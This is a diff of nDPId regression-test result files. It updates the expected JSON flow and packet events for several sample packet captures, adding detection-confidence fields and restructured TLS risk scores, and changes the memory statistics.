+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00150{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","total-events-serialized":20}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6/6
@@ -26,10 +26,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597403 bytes
-~~ total memory freed........: 4597403 bytes
-~~ total allocations/frees...: 99565/99565
+~~ total memory allocated....: 4681700 bytes
+~~ total memory freed........: 4681700 bytes
+~~ total allocations/frees...: 101155/101155
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 155 chars
-~~ json string max len.......: 744 chars
-~~ json string avg len.......: 519 chars
+~~ json string max len.......: 770 chars
+~~ json string avg len.......: 532 chars
diff --git a/test/results/tls-esni-fuzzed.pcap.out b/test/results/tls-esni-fuzzed.pcap.out
index 06159d5ce..47f37c28a 100644
--- a/test/results/tls-esni-fuzzed.pcap.out
+++ b/test/results/tls-esni-fuzzed.pcap.out
@@ -1,13 +1,13 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -20,9 +20,9 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4604756 bytes
-~~ total memory freed........: 4604756 bytes
-~~ total allocations/frees...: 99573/99573
+~~ total memory allocated....: 4689053 bytes
+~~ total memory freed........: 4689053 bytes
+~~ total allocations/frees...: 101163/101163
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
 ~~ json string max len.......: 1426 chars
diff --git a/test/results/tls-rdn-extract.pcap.out b/test/results/tls-rdn-extract.pcap.out
index 74258d9d3..343fb7b2a 100644
--- a/test/results/tls-rdn-extract.pcap.out
+++ b/test/results/tls-rdn-extract.pcap.out
@@ -1,12 +1,12 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="}
-00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\/IsZAEZFgRjb3JwMRcwFQYKCZImiZPyLGQBGRYHcmVkbW9uZDEqMCgGA1UEAxMhTWljcm9zb2Z0IFNlY3VyZSBTZXJ2ZXIgQXV0aG9yaXR5MB4XDTExMTAyMTE2NDIwM1oXDTEzMTAyMDE2NDIwM1owggVRMQswCQYDVQQGEwJVUzEQMA4GA1UEBxMHUmVkbW9uZDESMBAGA1UEChMJTWljcm9zb2Z0MQwwCgYDVQQLEwNHRlMxHjAcBgNVBAMMFSoub2ZmaWNlYXBwcy5saXZlLmNvbTEUMBIGA1UEAwwLKi5tc2Fkcy5uZXQxGTAXBgNVBAMMECouYWRzMi5tc2Fkcy5uZXQxGDAWBgNVBAMMDyouc3RjLnMtbXNuLmNvbTEtMCsGA1UEAwwkY2RuLmRjMmZpbGVzLioubGl2ZWZpbGVzdG9yZS1pbnQuY29tMSAwHgYDVQQDDBdjZG4uKi5saXZlZmlsZXN0b3JlLmNvbTEoMCYGA1UEAwwfKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLmNvbTEsMCoGA1UEAwwjKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLWludC5jb20xLTArBgNVBAMMJCoubWFya2V0cGxhY2Uud2luZG93c21vYmlsZS1wZXJmLmNvbTEYMBYGA1UEAwwPKi5zdGoucy1tc24uY29tMRswGQYDVQQDExJhamF4Lm1pY3Jvc29mdC5jb20xJDAiBgNVBAMMGyoubWljcm9zb2Z0LXNicy1kb21haW5zLmNvbTETMBEGA1UEAwwKKi5saXZlLm5ldDESMBAGA1UEAwwJKi5tc24uY29tMRYwFAYDVQQDDA0qLm1zbi1pbnQuY29tMSMwIQYDVQQDDBoqLmYxZHMuc2hhcmVkLmxpdmUtaW50LmNvbTEdMBsGA1UEAwwUKi5mMWRzLndseHJzLWludC5jb20xHjAcBgNVBAMMFSouc2hhcmVkLmxpdmUtaW50LmNvbTEaMBgGA1UEAwwRKi5zaGFyZWQubGl2ZS5jb20xGDAWBgNVBAMMDyoubWljcm9zb2Z0LmNvbTETMBEGA1UEAwwKKi5saXZlLmNvbTEXMBUGA1UEAwwOKi5saXZlLWludC5jb20xFDASBgNVBAMMCyoud2x4cnMuY29tMRgwFgYDVQQDDA8qLndseHJzLWludC5jb20xFzAVBgNVBAMMDiouc3Qucy1tc24uY29tMRgwFgYDVQQDDA8qLnN0Yi5zLW1zbi5jb20xKTAnBgNVBAMTIGltYWdlcy5tb3h5LndpbmRvd3NwaG9uZS1pbnQuY29tMRkwFwYDVQQDDBAqLndseHJzdS1pbnQuY29tMSwwKgYDVQQDEyNpbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUtaW50LmNvbTEoMCYGA1UEAxMfaW1hZ2VzLnBhcnRuZXIud2luZG93c3Bob25lLmNvbTEVMBMGA1UEAwwMKi5qcC5tc24uY29tMRswGQYDVQQDDBIqLmMzc2NzLmpwLm1zbi5jb20xGDAWBgNVBAMMDyouYXNwbmV0Y2RuLmNvbTEWMBQGA1UEAwwNKi5ob3RtYWlsLmNvbTEqMCgGA1UEAwwhKi5wYXJ0bmVyLWRmLndpbmRvd3NwaG9uZS1pbnQuY28="}
